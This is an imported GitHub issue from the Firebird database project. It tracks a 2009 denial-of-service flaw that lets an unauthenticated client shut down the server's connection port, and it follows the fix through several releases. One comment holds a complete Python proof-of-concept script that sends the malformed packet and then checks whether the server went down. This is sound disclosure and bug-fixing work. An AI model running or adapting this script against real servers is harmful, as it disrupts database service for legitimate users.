Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Possible DoS attack using the malformed packet sent into the connection port [CORE2563] #2973

Closed
firebird-issue-importer opened this issue Jul 20, 2009 · 11 comments

Comments

@firebird-issue-importer

Submitted by: @dyemanov

It's possible to shutdown the server's main port (3050 by default) via sending a malformed packet of some special format, thus causing a DoS condition for new incoming connections. This exploit can be used by an unauthenticated client. Reported 15-Jul-2009 by Core Security Technologies.

Commits: 0964cde 01fbf3c a095a41 d6c79a4

@firebird-issue-importer
Copy link
Author

@firebird-issue-importer firebird-issue-importer commented Jul 20, 2009

Modified by: @dyemanov

assignee: Dmitry Yemanov [ dimitr ]

@firebird-issue-importer
Copy link
Author

@firebird-issue-importer firebird-issue-importer commented Jul 20, 2009

Modified by: @dyemanov

status: Open [ 1 ] => In Progress [ 3 ]

@firebird-issue-importer
Copy link
Author

@firebird-issue-importer firebird-issue-importer commented Jul 20, 2009

Commented by: @dyemanov

This is the restricted (developers only) comment which contains a Python script reproducing the issue.

import socket
import time

def attack(host, port):
op_connect_request = '\x35' #⁠ Request to establish connection

packet  = '\\x00\\x00\\x00' \+ op\_connect\_request
packet \+= "A" \* 12              #⁠Invalid data, must be \>= 12 bytes in order to trigger the DoS

print "\(\+\) Connecting to the server\.\.\.\."
s = socket\.socket\(socket\.AF\_INET, socket\.SOCK\_STREAM\)
s\.connect\(\(host, port\)\)
print "\(\+\) Sending op\_connect\_request packet\.\.\."
s\.send\(str\(packet\)\)
s\.close\(\)
print "\(\+\) op\_connect\_request packet successfully sent\."

#⁠Wait 10 seconds and try to connect again to Firebird SQL server, to check if it's down
print "\(\+\) Waiting 10 seconds before trying to reconnect to the server\.\.\."
time\.sleep\(10\)

try:
    print "\(\+\) Trying to reconnect\.\.\."
    s = socket\.socket\(socket\.AF\_INET, socket\.SOCK\_STREAM\)
    s\.connect\(\(host, port\)\)
    s\.close\(\)
    print "\(\!\) Something went wrong\. The server is still alive\."
except socket\.error:
    print "\(\*\) Attack successful\. The server is down\."

port = 3050
host = '127.0.0.1' #⁠Replace with your target host
attack(host, port)

@firebird-issue-importer
Copy link
Author

@firebird-issue-importer firebird-issue-importer commented Jul 20, 2009

Modified by: @dyemanov

description: It's possible to shutdown the server's main port (3050 by default) via sending a malformed packet of some special format, thus causing a DoS condition for new incoming connections. This exploit can be used by an unauthenticated client. Reported 15-Jun-2009 by Core Security Technologies. => It's possible to shutdown the server's main port (3050 by default) via sending a malformed packet of some special format, thus causing a DoS condition for new incoming connections. This exploit can be used by an unauthenticated client. Reported 15-Jul-2009 by Core Security Technologies.

@firebird-issue-importer
Copy link
Author

@firebird-issue-importer firebird-issue-importer commented Jul 20, 2009

Modified by: @dyemanov

status: In Progress [ 3 ] => In Progress [ 3 ]

Fix Version: 2.1.3 [ 10302 ]

Fix Version: 2.5 Beta 2 [ 10300 ]

Fix Version: 1.5.6 [ 10225 ]

Fix Version: 2.0.6 [ 10303 ]

@firebird-issue-importer
Copy link
Author

@firebird-issue-importer firebird-issue-importer commented Jul 20, 2009

Modified by: @dyemanov

status: In Progress [ 3 ] => Open [ 1 ]

@firebird-issue-importer
Copy link
Author

@firebird-issue-importer firebird-issue-importer commented Jul 20, 2009

Modified by: @dyemanov

security: Developers [ 10012 ] =>

@firebird-issue-importer
Copy link
Author

@firebird-issue-importer firebird-issue-importer commented Jul 20, 2009

Modified by: @dyemanov

status: Open [ 1 ] => Resolved [ 5 ]

resolution: Fixed [ 1 ]

@firebird-issue-importer
Copy link
Author

@firebird-issue-importer firebird-issue-importer commented Nov 9, 2009

Modified by: @pcisar

status: Resolved [ 5 ] => Closed [ 6 ]

@firebird-issue-importer
Copy link
Author

@firebird-issue-importer firebird-issue-importer commented Jan 18, 2016

Modified by: @pavel-zotov

QA Status: No test

@firebird-issue-importer
Copy link
Author

@firebird-issue-importer firebird-issue-importer commented Aug 7, 2016

Modified by: @pavel-zotov

status: Closed [ 6 ] => Closed [ 6 ]

QA Status: No test => Not enough information

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment